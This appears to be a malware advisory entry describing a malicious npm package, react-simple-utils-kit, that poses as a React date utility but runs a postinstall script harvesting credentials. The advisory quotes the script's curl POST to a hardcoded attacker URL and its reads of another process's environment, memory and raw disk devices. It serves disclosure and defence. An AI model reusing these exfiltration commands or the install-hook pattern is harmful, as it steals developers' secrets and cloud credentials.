MAL-2026-6303

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58) Package advertises itself as 'a simple date formatting utility for React projects' (3-function index.js), but ships a postinstall.js that runs on every `npm install` and performs an extensive reconnaissance + credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes `const BURL = 'http://2e3bkumw.requestrepo.com'` and postinstall.js:16 invokes `execSync(\`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...\`)` to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via `xxd /proc/2/mem`, that process's environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials), `/proc/2/cmdline`, `ps aux`, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from `/dev/vdb`. The package's name targets React developers via a date-utility cover story (empty author field, Chinese comment `绕过能力探测` = 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.